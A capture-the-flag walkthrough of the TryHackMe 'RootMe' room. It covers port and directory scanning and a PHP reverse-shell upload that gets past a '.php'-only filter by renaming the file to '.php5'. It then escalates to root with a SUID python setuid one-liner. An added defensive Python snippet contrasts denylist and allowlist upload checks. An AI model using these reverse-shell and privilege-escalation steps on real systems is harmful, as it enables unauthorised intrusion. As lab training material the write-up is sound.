
# RootME

## [RootMe](https://www.tryhackme.com/room/rrootme)


A CTF for beginners, can you root me?

### Questions

* Scan the machine, how many ports are open?
* What version of Apache are running?
* What is the hidden directory?
* user.txt?
* Search for files with SUID permission, which file is weird?
* root.txt?

## Enumeration

### Nmap

> nmap -sSVC -A -O -vv

```
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home
```

#### Q: Scan the machine, how many ports are open?

> A: 2

#### Q: What version of Apache are running?

> A: 2.4.29

#### Q: What service is running on port 22?

> A: ssh

### Finding directories/files

> gobuster dir -u http://10.10.63.255:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt

(the IP is different because I continued this write-up the other day)

![](https://user-images.githubusercontent.com/53917092/95799616-9c977c80-0ccb-11eb-8c12-1261b632a434.png)

#### Q: What is the hidden directory?

> A: /panel/

Checking the directory /panel/, we have:

[![image](https://user-images.githubusercontent.com/53917092/95799962-ad94bd80-0ccc-11eb-82b6-bebb559e010c.png)](https://user-images.githubusercontent.com/53917092/95799962-ad94bd80-0ccc-11eb-82b6-bebb559e010c.png)

Let's try to upload a shell.

shell: <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php>

> curl <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php> -o revs.php

Remember to start a listener on a port first:

> nc -lvp PORT

[![image](https://user-images.githubusercontent.com/53917092/95800457-c487df80-0ccd-11eb-951b-1fa61fd38181.png)](https://user-images.githubusercontent.com/53917092/95800457-c487df80-0ccd-11eb-951b-1fa61fd38181.png)

The upload is rejected: "PHP isn't permitted".

Let's try bypassing this by using the ".php5" extension:

> mv revs.php revs.php5

[![image](https://user-images.githubusercontent.com/53917092/95800910-fcdbed80-0cce-11eb-9775-7ede504b29aa.png)](https://user-images.githubusercontent.com/53917092/95800910-fcdbed80-0cce-11eb-9775-7ede504b29aa.png)

It worked.
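As an added defensive illustration (not part of the original write-up or the room), this shows why the ".php5" rename gets past a check that only refuses a literal ".php" suffix, next to an allowlist check that refuses it, plus a helper a defender can run over the filenames in an existing upload directory to find files that slipped through. The allowed and PHP-like extension sets are assumptions for this example.

```python
import re

# PHP-interpretable extensions (constructed list for this example; the real set
# depends on the server's AddHandler/FilesMatch config, so it is NOT a safe denylist).
PHP_LIKE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}

# What the upload feature actually needs to accept (assumption for this example).
ALLOWED = {"png", "jpg", "jpeg", "gif", "txt"}


def denylist_check(filename: str) -> bool:
    """Weak check in the style the panel exhibits: refuse only a literal '.php'
    suffix. 'revs.php' is rejected, but 'revs.php5' passes."""
    return not filename.lower().endswith(".php")


def allowlist_check(filename: str) -> bool:
    """Hardened check: accept only names whose every extension is allowlisted.
    Every dot-separated part is checked, not just the last one, because with an
    AddHandler-based PHP binding Apache's mod_mime looks at all extensions, so
    'x.php.jpg' can still be executed as PHP."""
    # Reject path separators, NUL bytes, hidden files and extension-less names.
    if any(c in filename for c in "/\\\x00") or filename.startswith("."):
        return False
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False
    base, exts = parts[0], parts[1:]
    if not re.fullmatch(r"[a-z0-9_-]{1,64}", base):
        return False
    return all(ext in ALLOWED for ext in exts)


def denylist_bypasses(names):
    """Names the weak check accepts although some part is a PHP-like extension:
    exactly the gap the '.php5' upload above went through. Useful for auditing
    what is already sitting in an upload directory."""
    return [n for n in names
            if denylist_check(n)
            and any(p in PHP_LIKE for p in n.lower().split(".")[1:])]


if __name__ == "__main__":
    # Constructed sample batch, including the names used in the write-up.
    sample = ["revs.php", "revs.php5", "x.php.jpg", "photo.PNG", ".htaccess"]
    for n in sample:
        print(f"{n:12} denylist={denylist_check(n)!s:5} allowlist={allowlist_check(n)}")
    print("would have slipped through the denylist:", denylist_bypasses(sample))
```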

To run it, click on "veja" ("see").

![](https://user-images.githubusercontent.com/53917092/95801051-81c70700-0ccf-11eb-9179-d92c4d421c56.png)

It worked, we have a shell.

To get a proper TTY:

> python -c 'import pty;pty.spawn("/bin/bash")'

> Ctrl+Z

> stty raw -echo

> fg

> export TERM=xterm

![image](https://user-images.githubusercontent.com/53917092/95801836-087ce380-0cd2-11eb-9d6a-dfcb6863ae6c.png)

### user.txt

#### Finding

> find / -type f -name user.txt 2>/dev/null

[![image](https://user-images.githubusercontent.com/53917092/95803052-770f7080-0cd5-11eb-8a1d-a00ca7024fa4.png)](https://user-images.githubusercontent.com/53917092/95803052-770f7080-0cd5-11eb-8a1d-a00ca7024fa4.png)

#### Getting

> cat /var/www/user.txt

[![image](https://user-images.githubusercontent.com/53917092/97300372-1e8fb580-1835-11eb-9ff6-1de7305674cf.png)](https://user-images.githubusercontent.com/53917092/97300372-1e8fb580-1835-11eb-9ff6-1de7305674cf.png)

### root.txt / Privilege Escalation

To look for files with the SUID bit set, we can use the command:

> find / -type f -user root -perm -4000 2>/dev/null

![](https://user-images.githubusercontent.com/53917092/95803488-9ce94500-0cd6-11eb-9d5c-e8822a26ddb7.png)

#### Exploring the SUID bit on python

> python -c "import os;os.setuid(0);os.system('/bin/bash')"

![](https://user-images.githubusercontent.com/53917092/95803893-a7f0a500-0cd7-11eb-9a16-463b7cbc950a.png)

#### Getting

![](https://user-images.githubusercontent.com/53917092/97299626-fbb0d180-1833-11eb-8160-946f299c1725.png)
